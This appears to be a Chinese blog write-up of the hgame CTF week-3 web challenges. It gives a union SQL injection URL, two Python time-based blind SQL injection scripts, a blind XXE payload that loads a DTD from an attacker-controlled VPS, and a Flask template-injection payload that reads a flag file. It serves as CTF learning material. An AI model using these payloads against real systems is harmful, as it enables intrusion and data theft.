Sky's blog

week3-hgame之web粗略记录

字数统计: 719阅读时长: 4 min
2018/02/21 Share

前言

年终于算是过完了,闲下来做了一下hgame的week3,感觉还是挺简单的,题目比较传统,就粗略记录一下了,前两周的就不记录了,容易太多了

week3-送分的SQLi

太简单不细说了
payload:

1
http://118.25.18.223:10068/?id=-1%20union%20select%201,(select%20f111aaaggg_w3%20from%20f111aa4g)

得到flag:

1
hgame{Th3_e4sist_sql_injeCti0n##}

week3-正常的SQLi

有文件泄露index.php.bak

1
2
3
4
5
6
7
8
9
10
11
<?php

$username = base64_decode($_COOKIE['name']);

$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);

// echo $rs['flag'];
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";

正常的sleep盲注
脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import base64
import urllib
url = "http://123.206.203.108:10010/normalSQLi/index.php"
flag = ""
for i in range(1,1000):
for j in range(33,127):
#payload = "admin' or if((ascii(substr((),%s,1))=%s),sleep(3),false)#"%(i,j) user
#payload = "admin' or if((ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%s),sleep(3),false)#"%(i,j) user
#payload = "admin' or if((ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='user'),%s,1))=%s),sleep(3),false)#"%(i,j)
payload = "admin' or if((ascii(substr((select flag from user limit 2,1),%s,1))=%s),sleep(3),false)#"%(i,j)

cookie = {
"name":urllib.quote(base64.b64encode(payload))
}
try:
r = requests.get(url=url,cookies=cookie,timeout=2.5)
except:
flag +=chr(j)
print flag
break

得到flag:

1
hgame{fLag_1s_h4re.....}

week3-简单的SQLi

马丹,这个竟然过滤了substr,害得我一直以为我脚本写错了
脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
import hashlib
def md5(str1):
return hashlib.md5(str1).hexdigest()
def md5_fuck(str1):
i = 0
while True:
if md5(str(i))[4:8] == str1:
return i
else:
i+=1
cookie = {
"PHPSESSID":"6760c930541b7fd8b74b75676c625c18"
}
flag=""
url = "http://118.25.18.223:10086/index.php"
for i in range(1,10000):
for j in range(33,127):
r = requests.get(url=url, cookies=cookie)
code_str = r.content[130:134]
code_need = md5_fuck(code_str)
#id_my = '''1' or if((ascii(mid((database()),%s,1))=%s),sleep(5),1)%%23'''%(i,j) week3_sqli1
#id_my = '''1' or if((ascii(mid((select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%s),sleep(3),1)%%23'''%(i,j) users,w3_fllllllll4ag
#id_my = '''1' or if((ascii(mid((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='w3_fllllllll4ag'),%s,1))=%s),sleep(3),1)%%23'''%(i,j) dajiangyoude,haishijiangyou,f111144g_w3_sqli1
id_my = '''1' or if((ascii(mid((select f111144g_w3_sqli1 from w3_fllllllll4ag limit 0,1),%s,1))=%s),sleep(3),1)%%23'''%(i,j)
url_good = "http://118.25.18.223:10086/index.php?id=%s&code=%s" % (id_my, code_need)
try:
s = requests.get(url=url_good, cookies=cookie,timeout=2.5)
# print s.content
except:
flag +=chr(j)
print flag
break

得到flag:

1
hgame{sql_Injection_s000oo_fun}

week3-书店

很传统的blind xxe

1
2
3
4
5
6
<!DOCTYPE ANY[
<!ENTITY % r SYSTEM "http://vps_ip/hgame.xml">
%r;
%all;
%s;
]>

即可拿到flag:

1
hgame{Xxe_v3ry_funny!!!!}

week3-ngc’s blog

从5000端口以及hello猜测是SSTI,测试

1
http://111.230.105.104:5000/{{7+7}}

发现

1
2
Oops! That page doesn't exist.
http://111.230.105.104:5000/14

从而确定就是模板注入
payload:

1
http://111.230.105.104:5000/{{''.__class__.__mro__[2].__subclasses__()[40]('./flag', 'r').read()}}

得到flag:

1
hgame{skdvhdsbvadvnjVADBVS}

推荐文章:http://klaus.link/2017/Flask_SSTI/

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. 前言
  2. 2. week3-送分的SQLi
  3. 3. week3-正常的SQLi
  4. 4. week3-简单的SQLi
  5. 5. week3-书店
  6. 6. week3-ngc’s blog